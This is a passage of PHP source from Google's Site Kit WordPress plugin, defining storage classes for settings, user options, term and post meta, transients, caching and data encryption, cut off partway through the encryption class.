for view-only settings. * * @since 1.111.0 * * @return array An array of keys for view-only settings. */ public function get_view_only_keys(); } <?php /** * Class Google\Site_Kit\Core\Storage\Meta_Setting_Trait * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Base class for a single object meta setting. * * @since 1.33.0 * @since 1.146.0 Changed from Post_Meta_Setting to Meta_Setting_Trait. * * @access private * @ignore */ trait Meta_Setting_Trait { /** * Meta_Interface implementation. * * @since 1.33.0 * @var Meta_Interface */ protected $meta; /** * Gets the meta key for the setting. * * @since 1.145.0 * * @return string Meta key. */ abstract protected function get_meta_key(): string; /** * Gets the object type like `post`, `term`, etc. * * @since 1.146.0 * * @return string Object type. */ abstract protected function get_object_type(): string; /** * Registers the object setting in WordPress. * * @since 1.33.0 */ public function register() { register_meta( $this->get_object_type(), $this->get_meta_key(), array( 'type' => $this->get_type(), 'sanitize_callback' => $this->get_sanitize_callback(), 'single' => true, 'show_in_rest' => $this->get_show_in_rest(), ) ); } /** * Gets the expected value type. * * Returns 'string' by default for consistency with register_meta. * Override in a sub-class if different. * * Valid values are 'string', 'boolean', 'integer', 'number', 'array', and 'object'. * * @since 1.33.0 * * @return string The type name. */ protected function get_type() { return 'string'; } /** * Gets the default value. * * Returns an empty string by default. * Override in a sub-class if different. * * @since 1.33.0 * * @return mixed The default value. */ protected function get_default() { return ''; } /** * Gets the callback for sanitizing the setting's value before saving. * * For use internally with register_meta. * Returns `null` for consistency with the default in register_meta. * Override in a sub-class. * * @since 1.33.0 * * @return callable|null Sanitize callback function. */ protected function get_sanitize_callback() { return null; } /** * Gets the `show_in_rest` value for this meta setting value. * * @since 1.37.0 * * @return bool|Array Any valid value for the `show_in_rest` */ protected function get_show_in_rest() { return false; } /** * Checks whether meta exists for a given object or not. * * @since 1.33.0 * @since 1.146.0 Changed `$post_id` parameter to `$object_id`. * * @param int $object_id Object ID. * @return bool True if the meta key exists, otherwise false. */ public function has( $object_id ) { return metadata_exists( $this->get_object_type(), $object_id, $this->get_meta_key() ); } /** * Gets the value of the setting. * * @since 1.33.0 * @since 1.146.0 Changed `$post_id` parameter to `$object_id`. * * @param int $object_id Object ID. * @return mixed Value set for the setting, or default if not set. */ public function get( $object_id ) { if ( ! $this->has( $object_id ) ) { return $this->get_default(); } return $this->meta->get( $object_id, $this->get_meta_key(), true ); } /** * Updates the setting for the given object ID. * * @since 1.33.0 * @since 1.146.0 Changed `$post_id` parameter to `$object_id`. * * @param int $object_id Object ID. * @param mixed $value Metadata value. * @return bool TRUE on success, otherwise FALSE. */ public function set( $object_id, $value ) { return $this->meta->update( $object_id, $this->get_meta_key(), $value ); } /** * Deletes the setting for the given object ID. * * @since 1.33.0 * @since 1.146.0 Changed `$post_id` parameter to `$object_id`. * * @param int $object_id Object ID. * @return bool TRUE on success, otherwise FALSE. */ public function delete( $object_id ) { return $this->meta->delete( $object_id, $this->get_meta_key() ); } } <?php /** * Trait Google\Site_Kit\Core\Storage\Setting\List_Setting * * @package Google\Site_Kit\Core\Storage\Setting * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage\Setting; /** * A trait for a single setting of the array type. * * @since 1.98.0 * @access private * @ignore */ trait List_Setting { /** * Gets the expected value type. * * @since 1.98.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.98.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the value of the setting. * * @since 1.98.0 * * @return array Value set for the option, or default if not set. */ public function get() { $value = parent::get(); return is_array( $value ) ? $value : $this->get_default(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.98.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return array( $this, 'sanitize_list_items' ); } /** * Filters array items. * * @since 1.98.0 * * @param array $items The original array items. * @return array Filtered items. */ abstract protected function sanitize_list_items( $items ); } <?php /** * Trait Google\Site_Kit\Core\Storage\User_Aware * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Trait for user aware entities. * * @since 1.18.0 * @access private * @ignore */ trait User_Aware_Trait { /** * User ID. * * @since 1.18.0 * @var int */ private $user_id; /** * Gets the associated user ID. * * @since 1.18.0 * * @return int User ID. */ public function get_user_id() { return (int) $this->user_id; } /** * Switches the current user to the one with the given ID. * * This method exists to exchange the user that is set as the current user in WordPress on the fly. In most cases * it is preferred to create a new instance of the class when dealing with multiple users. This method should only * be applied when the entire chain of class main instances need to be updated to rely on another user, i.e. when * the current WordPress user has changed. * * @since 1.18.0 * * @param int $user_id User ID. * @return callable A closure to switch back to the original user. */ public function switch_user( $user_id ) { $prev_user_id = $this->user_id; $this->user_id = (int) $user_id; return function () use ( $prev_user_id ) { $this->user_id = $prev_user_id; }; } } <?php /** * Interface Google\Site_Kit\Core\Storage\Setting_With_Owned_Keys_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for a settings class that includes owned settings. * * @since 1.16.0 * @access private * @ignore */ interface Setting_With_Owned_Keys_Interface { /** * Returns keys for owned settings. * * @since 1.16.0 * * @return array An array of keys for owned settings. */ public function get_owned_keys(); } <?php /** * Class Google\Site_Kit\Core\Storage\User_Options * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Context; /** * Class providing access to per-user options. * * It uses user options (which are per site) or user meta, depending on in which mode the plugin is running. * * @since 1.0.0 * @access private * @ignore */ final class User_Options implements User_Options_Interface { use User_Aware_Trait; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param int $user_id Optional. User ID for whom options should be managed. Default is the current user. */ public function __construct( Context $context, $user_id = 0 ) { $this->context = $context; if ( empty( $user_id ) ) { $user_id = get_current_user_id(); } $this->user_id = (int) $user_id; } /** * Gets the value of the given user option. * * @since 1.0.0 * * @param string $option User option name. * @return mixed Value set for the user option, or false if not set. */ public function get( $option ) { $user_id = $this->get_user_id(); if ( ! $user_id ) { return false; } if ( $this->context->is_network_mode() ) { $value = get_user_meta( $user_id, $option ); if ( empty( $value ) ) { return false; } return $value[0]; } return get_user_option( $option, $user_id ); } /** * Sets the value for a user option. * * @since 1.0.0 * * @param string $option User option name. * @param mixed $value User option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ) { $user_id = $this->get_user_id(); if ( ! $user_id ) { return false; } if ( $this->context->is_network_mode() ) { return (bool) update_user_meta( $user_id, $option, $value ); } return (bool) update_user_option( $user_id, $option, $value ); } /** * Deletes the given user option. * * @since 1.0.0 * * @param string $option User option name. * @return bool True on success, false on failure. */ public function delete( $option ) { $user_id = $this->get_user_id(); if ( ! $user_id ) { return false; } if ( $this->context->is_network_mode() ) { return (bool) delete_user_meta( $user_id, $option ); } return (bool) delete_user_option( $user_id, $option ); } /** * Gets the underlying meta key for the given option. * * @since 1.4.0 * * @param string $option Option name. * @return string Meta key name. */ public function get_meta_key( $option ) { global $wpdb; if ( $this->context->is_network_mode() ) { return $option; } return $wpdb->get_blog_prefix() . $option; } } <?php /** * Trait Google\Site_Kit\Core\Storage\Setting_With_Owned_Keys_Trait * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Setting; /** * Trait for a Setting that has owner ID option key. * * @since 1.16.0 * @access private * @ignore */ trait Setting_With_Owned_Keys_Trait { /** * Returns keys for owned settings. * * @since 1.16.0 * * @return array An array of keys for owned settings. */ abstract public function get_owned_keys(); /** * Registers hooks to determine an owner ID for a module. * * @since 1.16.0 */ protected function register_owned_keys() { add_action( 'add_option_' . static::OPTION, function ( $option, $settings ) { if ( ! current_user_can( Permissions::MANAGE_OPTIONS ) ) { return; } if ( ! is_array( $settings ) || ! $this instanceof Setting ) { return; } $defaults = $this->get_default(); if ( ! is_array( $defaults ) ) { return; } if ( $this->have_owned_settings_changed( $settings, $defaults ) ) { $this->merge_initial_owner_id(); } }, 10, 2 ); add_filter( 'pre_update_option_' . static::OPTION, function ( $settings, $old_settings ) { if ( current_user_can( Permissions::MANAGE_OPTIONS ) && is_array( $settings ) && is_array( $old_settings ) && $this->have_owned_settings_changed( $settings, $old_settings ) ) { return $this->update_owner_id_in_settings( $settings ); } return $settings; }, 10, 2 ); } /** * Merges the current user ID into the module settings as the initial owner ID. * * @since 1.99.0 */ protected function merge_initial_owner_id() { $this->merge( array( 'ownerID' => get_current_user_id() ) ); } /** * Adds the current user ID as the module owner ID to the current module settings. * * @since 1.99.0 * * @param array $settings The new module settings. * @return array Updated module settings with the current user ID as the ownerID setting. */ protected function update_owner_id_in_settings( $settings ) { $settings['ownerID'] = get_current_user_id(); return $settings; } /** * Determines whether the owned settings have changed. * * @since 1.99.0 * * @param array $settings The new settings. * @param array $old_settings The old settings. * @return bool TRUE if owned settings have changed, otherwise FALSE. */ protected function have_owned_settings_changed( $settings, $old_settings ) { $keys = $this->get_owned_keys(); foreach ( $keys as $key ) { if ( isset( $settings[ $key ], $old_settings[ $key ] ) && $settings[ $key ] !== $old_settings[ $key ] ) { return true; } } return false; } } <?php /** * Interface Google\Site_Kit\Core\Storage\User_Aware_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for Options implementations. * * @since 1.18.0 * @access private * @ignore */ interface User_Aware_Interface { /** * Gets the associated user ID. * * @since 1.18.0 * * @return int User ID. */ public function get_user_id(); /** * Switches the current user to the one with the given ID. * * @since 1.18.0 * * @param int $user_id User ID. * @return callable A closure to switch back to the original user. */ public function switch_user( $user_id ); } <?php /** * Class Google\Site_Kit\Core\Storage\Term_Meta * * @package Google\Site_Kit\Core\Storage * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Term metadata storage class. * * @since 1.146.0 * @access private * @ignore */ final class Term_Meta implements Meta_Interface { /** * Gets term meta. * * @since 1.146.0 * * @param int $term_id Term ID. * @param string $key Metadata key. * @param bool $single Whether to return a single value. * @return mixed Term meta value. */ public function get( $term_id, $key, $single = false ) { return get_term_meta( $term_id, $key, $single ); } /** * Updates a term meta field based on the given term ID. * * @since 1.146.0 * * @param int $term_id Term ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param mixed $prev_value Previous value to check before updating. If specified, only update existing metadata entries with this value. Otherwise, update all entries. * @return bool TRUE on success, otherwise FALSE. */ public function update( $term_id, $key, $value, $prev_value = '' ) { return update_term_meta( $term_id, $key, $value, $prev_value ); } /** * Adds a meta field to the given term. * * @since 1.146.0 * * @param int $term_id Term ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param bool $unique Whether the same key should not be added. * @return int|bool Meta id on success, otherwise FALSE. */ public function add( $term_id, $key, $value, $unique = false ) { return add_term_meta( $term_id, $key, $value, $unique ); } /** * Deletes a term meta field for the given term ID. * * @since 1.146.0 * * @param int $term_id Term ID. * @param string $key Metadata key. * @param mixed $value Metadata value. If provided, rows will only be removed that match the value. * @return bool TRUE on success, otherwise FALSE. */ public function delete( $term_id, $key, $value = '' ) { return delete_term_meta( $term_id, $key, $value ); } } <?php /** * Interface Google\Site_Kit\Core\Storage\User_Options_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for Options implementations. * * @since 1.4.0 * @access private * @ignore */ interface User_Options_Interface extends User_Aware_Interface { /** * Gets the value of the given option. * * @since 1.4.0 * * @param string $option Option name. * @return mixed Value set for the option, or false if not set. */ public function get( $option ); /** * Sets the value for a option. * * @since 1.4.0 * * @param string $option Option name. * @param mixed $value Option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ); /** * Deletes the given option. * * @since 1.4.0 * * @param string $option Option name. * @return bool True on success, false on failure. */ public function delete( $option ); /** * Gets the underlying meta key for the given option. * * @since 1.4.0 * * @param string $option Option name. * @return string Meta key name. */ public function get_meta_key( $option ); } <?php /** * Trait Google\Site_Kit\Core\Storage\Setting_With_Legacy_Keys_Trait * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Core\Util\Migrate_Legacy_Keys; /** * Trait for a Setting that has legacy option keys to migrate. * * @since 1.2.0 * @access private * @ignore */ trait Setting_With_Legacy_Keys_Trait { use Migrate_Legacy_Keys; /** * Registers an option filter for the setting to migrate legacy keys. * * @param array $legacy_key_map Mapping of legacy keys to current key. * * @since 1.2.0 */ protected function register_legacy_keys_migration( array $legacy_key_map ) { add_filter( 'option_' . static::OPTION, function ( $option ) use ( $legacy_key_map ) { if ( is_array( $option ) ) { return $this->migrate_legacy_keys( $option, $legacy_key_map ); } return $option; }, 0 ); } } <?php /** * Class Google\Site_Kit\Core\Storage * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Base class for a single setting. * * @since 1.2.0 * @access private * @ignore */ abstract class Setting { /** * The option_name for this setting. * Override in a sub-class. */ const OPTION = ''; /** * Options instance implementing Options_Interface. * * @since 1.2.0 * @var Options_Interface */ protected $options; /** * Setting constructor. * * @since 1.2.0 * * @param Options_Interface $options Options_Interface instance. */ public function __construct( Options_Interface $options ) { $this->options = $options; } /** * Registers the setting in WordPress. * * @since 1.2.0 */ public function register() { register_setting( static::OPTION, static::OPTION, array( 'type' => $this->get_type(), 'sanitize_callback' => $this->get_sanitize_callback(), 'default' => $this->get_default(), ) ); } /** * Subscribes to updates for this setting. * * @since 1.118.0 * * @param callable $callback Function taking $old_value & $new_value parameters that gets called when option value updates. * @return \Closure Function to remove added listeners. */ public function on_change( callable $callback ) { $option = static::OPTION; $on_add_option = function ( $_, $value ) use ( $callback ) { $callback( $this->get_default(), $value ); }; add_action( "add_option_{$option}", $on_add_option, 10, 2 ); $on_update_option = function ( $old_value, $value ) use ( $callback ) { $callback( $old_value, $value ); }; add_action( "update_option_{$option}", $on_update_option, 10, 2 ); return function () use ( $option, $on_add_option, $on_update_option ) { remove_action( "add_option_{$option}", $on_add_option ); remove_action( "update_option_{$option}", $on_update_option ); }; } /** * Checks whether or not the option is set with a valid value. * * @since 1.2.0 * @since 1.3.0 Now relies on {@see Options_Interface::has()}. * * @return bool True on success, false on failure. */ public function has() { return $this->options->has( static::OPTION ); } /** * Gets the value of the setting. * * @since 1.2.0 * * @return mixed Value set for the option, or registered default if not set. */ public function get() { return $this->options->get( static::OPTION ); } /** * Sets the value of the setting with the given value. * * @since 1.2.0 * * @param mixed $value Setting value. Must be serializable if non-scalar. * * @return bool True on success, false on failure. */ public function set( $value ) { return $this->options->set( static::OPTION, $value ); } /** * Deletes the setting. * * @since 1.2.0 * * @return bool True on success, false on failure. */ public function delete() { return $this->options->delete( static::OPTION ); } /** * Gets the expected value type. * * Returns 'string' by default for consistency with register_setting. * Override in a sub-class if different. * * @since 1.2.0 * * @return string The type name. */ protected function get_type() { return 'string'; } /** * Gets the default value. * * For use with register_setting and fetching the default directly. * Returns false by default for consistency with get_option. * Override in a sub-class if different. * * @since 1.2.0 * * @return mixed The default value. */ protected function get_default() { return false; } /** * Gets the callback for sanitizing the setting's value before saving. * * For use internally with register_setting. * Returns `null` for consistency with the default in register_setting. * Override in a sub-class. * * @since 1.2.0 * * @return callable|null */ protected function get_sanitize_callback() { return null; } } <?php /** * Class Google\Site_Kit\Core\Storage\Cache * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit_Dependencies\Google\Service\Exception as Google_Service_Exception; /** * Class providing a server side caching framework. * * @since 1.0.0 * @access private * @ignore */ final class Cache { /** * The key for saving the global cache keys. * * @var string $global_cache_keys_key The key. */ private static $global_cache_keys_key = 'googlesitekit_global_cache_keys'; /** * The global record of cache keys used on the site. * * @var array */ private $global_cache_keys; /** * Construct the Cache class. */ public function __construct() { $this->global_cache_keys = get_option( self::$global_cache_keys_key ) ?: array(); } /** * Helper function to get the cache data. */ public function get_current_cache_data() { $cache_data = array(); // Add the global cache data. $keys = $this->get_global_cache_keys(); foreach ( $keys as $key ) { // This only retrieves fresh data because transients expire. $cache = get_transient( 'googlesitekit_' . $key ); if ( $cache ) { $cache_data[ $key ] = $cache; } else { // Remove the expired key from the global cache. $this->remove_global_cache_key( $key ); } } return $cache_data; } /** * Remove a cache key to the global record of cache keys. * * @param string $key The key to add. */ private function remove_global_cache_key( $key ) { $key_index = array_search( $key, $this->global_cache_keys, true ); if ( $key_index ) { unset( $this->global_cache_keys[ $key_index ] ); update_option( self::$global_cache_keys_key, $this->global_cache_keys, false ); } } /** * Add a cache key to the global record of cache keys. * * @param string $key The key to add. */ private function add_global_cache_key( $key ) { // Only add the key if it isn't already present. if ( ! in_array( $key, $this->global_cache_keys, true ) ) { $this->global_cache_keys[] = $key; update_option( self::$global_cache_keys_key, $this->global_cache_keys, false ); } } /** * Retrieve the global record of cache keys. * * @return array The array of cache keys used on the site. */ private function get_global_cache_keys() { return $this->global_cache_keys; } /** * Cache some data. * * @param Object $key The original data key. * @param Object $data The data to cache. */ public function set_cache_data( $key, $data ) { set_transient( 'googlesitekit_' . $key, $data, HOUR_IN_SECONDS ); $this->add_global_cache_key( $key ); } /** * Cache the results of a batch operation. * * @param array $batch_requests The original requests. * @param array $results The results to cache. */ public function cache_batch_results( $batch_requests, $results ) { $request_keys = wp_list_pluck( $batch_requests, 'key' ); foreach ( $results as $key => $result ) { if ( $result instanceof \Exception || $result instanceof Google_Service_Exception ) { continue; } $key = str_replace( 'response-', '', $key ); if ( in_array( $key, $request_keys, true ) ) { $this->set_cache_data( $key, $result ); } } } } <?php /** * Class Google\Site_Kit\Core\Storage\User_Setting * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Base class for a single user setting. * * @since 1.4.0 * @access private * @ignore */ abstract class User_Setting { /** * The user option name for this setting. * Override in a sub-class. */ const OPTION = ''; /** * User_Options_Interface implementation. * * @since 1.4.0 * @var User_Options_Interface */ protected $user_options; /** * User_Setting constructor. * * @since 1.4.0 * * @param User_Options_Interface $user_options User_Options_Interface instance. */ public function __construct( User_Options_Interface $user_options ) { $this->user_options = $user_options; } /** * Registers the setting in WordPress. * * @since 1.4.0 */ public function register() { register_meta( 'user', $this->user_options->get_meta_key( static::OPTION ), array( 'type' => $this->get_type(), 'sanitize_callback' => $this->get_sanitize_callback(), 'single' => true, ) ); } /** * Checks whether or not the setting exists. * * @since 1.4.0 * * @return bool True on success, false on failure. */ public function has() { return metadata_exists( 'user', $this->user_options->get_user_id(), $this->user_options->get_meta_key( static::OPTION ) ); } /** * Gets the value of the setting. * * @since 1.4.0 * * @return mixed Value set for the option, or default if not set. */ public function get() { if ( ! $this->has() ) { return $this->get_default(); } return $this->user_options->get( static::OPTION ); } /** * Sets the value of the setting with the given value. * * @since 1.4.0 * * @param mixed $value Setting value. Must be serializable if non-scalar. * * @return bool True on success, false on failure. */ public function set( $value ) { return $this->user_options->set( static::OPTION, $value ); } /** * Deletes the setting. * * @since 1.4.0 * * @return bool True on success, false on failure. */ public function delete() { return $this->user_options->delete( static::OPTION ); } /** * Gets the expected value type. * * Returns 'string' by default for consistency with register_meta. * Override in a sub-class if different. * * Valid values are 'string', 'boolean', 'integer', 'number', 'array', and 'object'. * * @since 1.4.0 * * @return string The type name. */ protected function get_type() { return 'string'; } /** * Gets the default value. * * Returns an empty string by default for consistency with get_user_meta. * Override in a sub-class if different. * * @since 1.4.0 * * @return mixed The default value. */ protected function get_default() { return ''; } /** * Gets the callback for sanitizing the setting's value before saving. * * For use internally with register_meta. * Returns `null` for consistency with the default in register_meta. * Override in a sub-class. * * @since 1.4.0 * * @return callable|null */ protected function get_sanitize_callback() { return null; } } <?php /** * Class Google\Site_Kit\Core\Storage\Encrypted_User_Options * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Class providing access to encrypted per-user options. * * @since 1.0.0 * @access private * @ignore */ final class Encrypted_User_Options implements User_Options_Interface { /** * Data Encryption API instance. * * @since 1.0.0 * @var Data_Encryption */ private $encryption; /** * User Option API instance. * * @since 1.0.0 * @var User_Options */ private $user_options; /** * Constructor. * * @since 1.0.0 * * @param User_Options $user_options User Option API instance. */ public function __construct( User_Options $user_options ) { $this->encryption = new Data_Encryption(); $this->user_options = $user_options; } /** * Gets the value of the given user option. * * @since 1.0.0 * * @param string $option User option name. * @return mixed Value set for the user option, or false if not set. */ public function get( $option ) { $raw_value = $this->user_options->get( $option ); if ( ! $raw_value ) { return false; } $data = $this->encryption->decrypt( $raw_value ); return maybe_unserialize( $data ); } /** * Sets the value for a user option. * * @since 1.0.0 * * @param string $option User option name. * @param mixed $value User option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ) { if ( ! is_scalar( $value ) ) { $value = maybe_serialize( $value ); } $raw_value = $this->encryption->encrypt( $value ); if ( ! $raw_value ) { return false; } return $this->user_options->set( $option, $raw_value ); } /** * Deletes the given user option. * * @since 1.0.0 * * @param string $option User option name. * @return bool True on success, false on failure. */ public function delete( $option ) { return $this->user_options->delete( $option ); } /** * Gets the underlying meta key for the given option. * * @since 1.4.0 * * @param string $option Option name. * @return string Meta key name. */ public function get_meta_key( $option ) { return $this->user_options->get_meta_key( $option ); } /** * Gets the ID of the user that options are controlled for. * * @since 1.4.0 * * @return int User ID. */ public function get_user_id() { return $this->user_options->get_user_id(); } /** * Switches the user that options are controlled for to the one with the given ID. * * @since 1.4.0 * * @param int $user_id User ID. */ public function switch_user( $user_id ) { $this->user_options->switch_user( $user_id ); } } <?php /** * Class Google\Site_Kit\Core\Storage\User_Transients * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Context; /** * Class providing access to per-user transients. * * @since 1.18.0 * @access private * @ignore */ class User_Transients implements User_Aware_Interface { /** * Plugin context. * * @since 1.18.0 * @var Context */ private $context; /** * User_Options object. * * @since 1.18.0 * @var User_Options */ private $user_options; /** * External cache group. * * @since 1.18.0 * @var string */ private $ext_cache_group; /** * Constructor. * * @since 1.18.0 * * @param Context $context Plugin context. * @param int $user_id Optional. User ID for whom transients should be managed. Default is the current user. */ public function __construct( Context $context, $user_id = 0 ) { $this->context = $context; $this->user_options = new User_Options( $context, $user_id ); $this->ext_cache_group = $context->is_network_mode() ? 'site-transient' : 'transient'; } /** * Gets the associated user ID. * * @since 1.18.0 * * @return int User ID. */ public function get_user_id() { return $this->user_options->get_user_id(); } /** * Switches the current user to the one with the given ID. * * This method exists to exchange the user that is set as the current user in WordPress on the fly. In most cases * it is preferred to create a new instance of the class when dealing with multiple users. This method should only * be applied when the entire chain of class main instances need to be updated to rely on another user, i.e. when * the current WordPress user has changed. * * @since 1.18.0 * * @param int $user_id User ID. * @return callable A closure to switch back to the original user. */ public function switch_user( $user_id ) { return $this->user_options->switch_user( $user_id ); } /** * Gets the value of the given transient. * * @since 1.18.0 * * @param string $transient Transient name. * @return mixed Value set for the transient, or false if not set. */ public function get( $transient ) { return wp_using_ext_object_cache() ? $this->get_from_cache( $transient ) : $this->get_from_user_options( $transient ); } /** * Sets the value for a transient. * * @since 1.18.0 * * @param string $transient Transient name. * @param mixed $value Transient value. * @param int $expiration Optional. Time until expiration in seconds. Default 0 (no expiration). * @return bool True on success, false on failure. */ public function set( $transient, $value, $expiration = 0 ) { return wp_using_ext_object_cache() ? $this->set_in_cache( $transient, $value, $expiration ) : $this->set_in_user_options( $transient, $value, $expiration ); } /** * Deletes the given transient. * * @since 1.18.0 * * @param string $transient Transient name. * @return bool True on success, false on failure. */ public function delete( $transient ) { return wp_using_ext_object_cache() ? $this->delete_from_cache( $transient ) : $this->delete_from_user_options( $transient ); } /** * Gets prefixed transient name for an external cache. * * @since 1.18.0 * * @param string $transient Transient name. * @return string Prefixed transient name. */ private function get_transient_name_for_cache( $transient ) { $user_id = $this->get_user_id(); return $this->user_options->get_meta_key( "user_{$user_id}_{$transient}" ); } /** * Gets the value of the given transient from an external cache. * * @since 1.18.0 * * @param string $transient Transient name. * @return mixed Value set for the transient, or false if not set. */ private function get_from_cache( $transient ) { return wp_cache_get( $this->get_transient_name_for_cache( $transient ), $this->ext_cache_group ); } /** * Sets the value for a transient in an external cache. * * @since 1.18.0 * * @param string $transient Transient name. * @param mixed $value Transient value. * @param int $expiration Optional. Time until expiration in seconds. Default 0 (no expiration). * @return bool True on success, false on failure. */ private function set_in_cache( $transient, $value, $expiration ) { return wp_cache_set( $this->get_transient_name_for_cache( $transient ), $value, $this->ext_cache_group, // phpcs:ignore WordPressVIPMinimum.Performance.LowExpiryCacheTime.CacheTimeUndetermined (int) $expiration ); } /** * Deletes the given transient in an external cache. * * @since 1.18.0 * * @param string $transient Transient name. * @return bool True on success, false on failure. */ private function delete_from_cache( $transient ) { return wp_cache_delete( $this->get_transient_name_for_cache( $transient ), $this->ext_cache_group ); } /** * Gets prefixed transient name. * * @since 1.18.0 * * @param string $transient Transient name. * @return string Prefixed transient name. */ private function get_transient_name_for_user_options( $transient ) { return 'googlesitekit_transient_' . $transient; } /** * Gets prefixed transient timeout name. * * @since 1.18.0 * * @param string $transient Transient name. * @return string Prefixed transient timeout name. */ private function get_transient_timeout_for_user_options( $transient ) { return 'googlesitekit_transient_timeout_' . $transient; } /** * Gets the value of the given transient. * * @since 1.18.0 * * @param string $transient Transient name. * @return mixed Value set for the transient, or false if not set. */ private function get_from_user_options( $transient ) { $prefixed_transient_timeout = $this->get_transient_timeout_for_user_options( $transient ); $timeout = $this->user_options->get( $prefixed_transient_timeout ); if ( false === $timeout || $timeout < time() ) { $this->delete( $transient ); return false; } $prefixed_transient = $this->get_transient_name_for_user_options( $transient ); return $this->user_options->get( $prefixed_transient ); } /** * Sets the value for a transient. * * @since 1.18.0 * * @param string $transient Transient name. * @param mixed $value Transient value. * @param int $expiration Optional. Time until expiration in seconds. Default 0 (no expiration). * @return bool True on success, false on failure. */ private function set_in_user_options( $transient, $value, $expiration ) { $prefixed_transient_timeout = $this->get_transient_timeout_for_user_options( $transient ); $this->user_options->set( $prefixed_transient_timeout, time() + $expiration ); $prefixed_transient = $this->get_transient_name_for_user_options( $transient ); return $this->user_options->set( $prefixed_transient, $value ); } /** * Deletes the given transient. * * @since 1.18.0 * * @param string $transient Transient name. * @return bool True on success, false on failure. */ private function delete_from_user_options( $transient ) { $prefixed_transient_timeout = $this->get_transient_timeout_for_user_options( $transient ); $this->user_options->delete( $prefixed_transient_timeout ); $prefixed_transient = $this->get_transient_name_for_user_options( $transient ); return $this->user_options->delete( $prefixed_transient ); } } <?php /** * Class Google\Site_Kit\Core\Storage\Data_Encryption * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Class responsible for encrypting and decrypting data. * * @since 1.0.0 * @access private * @ignore */ final class Data_Encryption { /** * Key to use for encryption. * * @since 1.0.0 * @var string */ private $key; /** * Salt to use for encryption. * * @since 1.0.0 * @var string */ private $salt; /** * Constructor. * * @since 1.0.0 */ public function __construct() { $this->key = $this->get_default_key(); $this->salt = $this->get_default_salt(); } /** * Encrypts a value. * * If a user-based key is set, that key is used. Otherwise the default key is used. * * @since 1.0.0 * * @param string $value Value to encrypt. * @return string|bool Encrypted value, or false on failure. */ public function encrypt( $value ) { if ( ! extension_loaded( 'openssl' ) ) { return $value; } $method = 'aes-256-ctr'; $ivlen = openssl_cipher_iv_length( $method ); $iv = openssl_random_pseudo_bytes( $ivlen ); $raw_value = openssl_encrypt( $value . $this->salt, $method, $this->key, 0, $iv ); if ( ! $raw_value ) { return false; } return base64_encode( $iv . $raw_value ); } /** * Decrypts a value. * * If a user-based key is set, that key is used. Otherwise the default key is used. * * @since 1.0.0 * * @param string 